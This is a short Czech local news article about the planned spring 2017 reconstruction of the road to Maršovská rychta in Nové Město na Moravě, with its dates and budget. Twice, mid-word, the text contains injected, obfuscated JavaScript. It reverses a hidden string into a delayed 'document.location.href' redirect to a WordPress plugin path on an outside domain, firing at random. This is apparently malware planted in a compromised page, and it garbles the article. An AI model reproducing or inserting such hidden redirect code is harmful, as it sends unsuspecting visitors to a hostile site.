Rainbow page separator

Na jaře projde rekonstrukcí silnice vedoucí k Maršovské rychtě

Sobota, 28. ledna 2017

Nové Měs[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na Moravě / Zrekonstruovat silnici vedoucí k Maršovské rychtě, která je dlouhodobě ve špatném stavu, v průběhu první poloviny le[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tošního roku plánuje novoměstská radnice. Oprava povrchu komunikace byla několik let odkládána kvůli budování kanalizace a přeložkám vedení inženýrských sítí.
Rekonstrukcí projde úsek komunikace od křižovatky s hlavní silnicí, dále kolem restaurace Romantika až k Maršovské rychtě. Stavební úpravy se dotknou jak povrchu silnice, tak i kanálových vpustí a chodníku od Romantiky po prodejnu.
Práce mají podle stanoveného harmonogramu začít 6. března a dokončené mají být nejpozději do 12. května. Novoměstská radnice má na rekonstrukci části ulice vyčleněných 4,76 milionu korun.